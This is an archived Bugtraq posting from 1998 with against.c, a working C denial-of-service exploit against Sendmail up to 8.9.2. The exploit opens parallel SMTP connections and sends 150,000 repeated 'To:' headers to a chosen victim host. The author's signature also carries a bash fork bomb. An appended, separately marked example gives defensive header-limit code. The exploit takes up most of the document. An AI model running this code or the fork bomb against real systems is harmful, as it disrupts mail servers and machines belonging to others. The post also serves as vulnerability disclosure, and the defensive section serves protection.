against.c

Posted Aug 17, 1999

Sendmail 8.9.2 Denial of Service exploit code.

tags | exploit, denial of service
SHA-256 | 94909bd0dc366bd42f8c781b305c85ac38cce1c99b9811467f3d2efef15067f9

Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
----------------------------------------


Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short
description of problem + suggested patch (instead of exploit), to give
developers a chance. Unfortunately, I put together information about two
completely different problems in single posting, and it confused a lot of
people. So, to kill any senseless discussions - again:

- The first one was 'redirection attack'; I said you could call it 'bug'
instead of 'feature', but as no one likes anonymous mailbombing,
network overloading / scanning, it's good to apply sendmail.cf patch
included in original posting; without it, your relay could be abused in
many painful ways. And yes, attack has been confirmed with 8.9.2 and
sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
anything left to talk about. Dot.

- The second one was DoS attack during headers parsing - and this is
a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
Unfortunately, all feedback we received from developers was one-line
response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
not to publish an exploit, but now I realized there's no chance for
response from vendors if there's no real danger. So here it is.
Attached file, against.c, should perform very 'light' attack, only
for testing purposes. If you noticed increased LA during attack,
your machine is vulnerable. You had enough time to patch your system
- don't blame me, but vendors. EOF.

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]


------------------------------snip here----------------------------------

/*
   against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
   (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>

   Usage: ./against existing_user_on_victim_host victim_host
   Example: ./against nobody lamers.net

*/

#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>   /* waitpid() */
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>

#define MAXCONN 5       /* parallel SMTP connections, one child process each */
#define LINES 150000    /* "To:" header lines sent on each connection */

struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;

int main(int argc,char* argv[]) {

  printf("against.c - another Sendmail DoS (up to 8.9.2)\n");

  if (argc-3) {
    printf("Usage: %s victim_user victim_host\n",argv[0]);
    exit(0);
  }

  hp=gethostbyname(argv[2]);

  if (!hp) {
    perror("gethostbyname");
    exit(1);
  }

  fprintf(stderr,"Doing mess: ");

  /* Each child opens one connection to port 25 and sends one message. */
  for (;loop<MAXCONN;loop++) if (!(x=fork())) {
    FILE* d;
    bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
    s.sin_family=hp->h_addrtype;
    s.sin_port=htons(25);
    if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
    if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
    if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }

    usleep(100000);

    /* SMTP envelope */
    fprintf(d,"helo tweety\n");
    fprintf(d,"mail from: tweety@polbox.com\n");
    fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
    fprintf(d,"data\n");

    usleep(100000);

    /* Message headers: the same "To:" field repeated LINES times */
    for(loop=0;loop<LINES;loop++) {
      if (!(loop%100)) fprintf(stderr,".");
      fprintf(d,"To: x\n");
    }

    /* Blank line ends the headers; short body, then end of DATA */
    fprintf(d,"\n\n\nsomedata\n\n\n");

    fprintf(d,".\n");

    sleep(1);

    fprintf(d,"quit\n");
    fflush(d);

    sleep(100);
    shutdown(suck,2);
    close(suck);
    exit(0);
  }

  /* Parent: waits for the child that was forked last */
  waitpid(x,&loop,0);

  fprintf(stderr,"ok\n");

  return 0;
}
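
Added example, not part of the original posting and not sendmail's patch: a bounded check on a message's header block that a mail server or filter can run before full header parsing, so that a DATA section made of repeated "To:" lines is refused after a fixed amount of work. The caps, the function names and the sample builder are assumptions chosen for illustration.

```c
#include <stdlib.h>
#include <string.h>
#include <strings.h>
/* Assumed policy caps for this example; they are not sendmail's values. */
#define MAX_HDR_LINES   1000
#define MAX_HDR_BYTES   32768
#define MAX_RCPT_FIELDS 50      /* To:/Cc:/Bcc: fields per message */

enum hdr_verdict { HDR_OK, HDR_TOO_MANY_LINES, HDR_TOO_LARGE, HDR_TOO_MANY_RCPT_FIELDS };

static int is_rcpt_field(const char *line, size_t len) {
    static const char *names[] = { "To:", "Cc:", "Bcc:" };
    for (size_t i = 0; i < 3; i++) {
        size_t n = strlen(names[i]);
        if (len >= n && strncasecmp(line, names[i], n) == 0) return 1;
    }
    return 0;
}

/* Walk the header block (up to the first empty line); stop at the first cap exceeded. */
enum hdr_verdict check_headers(const char *msg, size_t msglen) {
    size_t lines = 0, bytes = 0, rcpt = 0, pos = 0;
    while (pos < msglen) {
        const char *nl = memchr(msg + pos, '\n', msglen - pos);
        size_t raw = nl ? (size_t)(nl - (msg + pos)) + 1 : msglen - pos;
        size_t len = raw;                         /* line length without CR/LF */
        while (len && (msg[pos + len - 1] == '\n' || msg[pos + len - 1] == '\r')) len--;
        if (len == 0) break;                      /* blank line ends the headers */
        if ((bytes += raw) > MAX_HDR_BYTES) return HDR_TOO_LARGE;
        if (++lines > MAX_HDR_LINES) return HDR_TOO_MANY_LINES;
        /* Folded lines (leading SP/HTAB) continue the previous field. */
        if (msg[pos] != ' ' && msg[pos] != '\t' && is_rcpt_field(msg + pos, len)
            && ++rcpt > MAX_RCPT_FIELDS) return HDR_TOO_MANY_RCPT_FIELDS;
        pos += raw;
    }
    return HDR_OK;
}

/* Constructed sample: `count` copies of `line`, then a blank line and a body. */
enum hdr_verdict verdict_for_repeated(const char *line, size_t count) {
    size_t n = strlen(line), off = 0;
    char *buf = malloc(n * count + 8);
    if (!buf) abort();
    for (size_t i = 0; i < count; i++, off += n) memcpy(buf + off, line, n);
    memcpy(buf + off, "\nbody\n", 6);
    enum hdr_verdict v = check_headers(buf, off + 6);
    free(buf);
    return v;
}
```

Because the scan returns at the first exceeded cap, a header block shaped like the one against.c sends is classified after 51 lines regardless of how many follow.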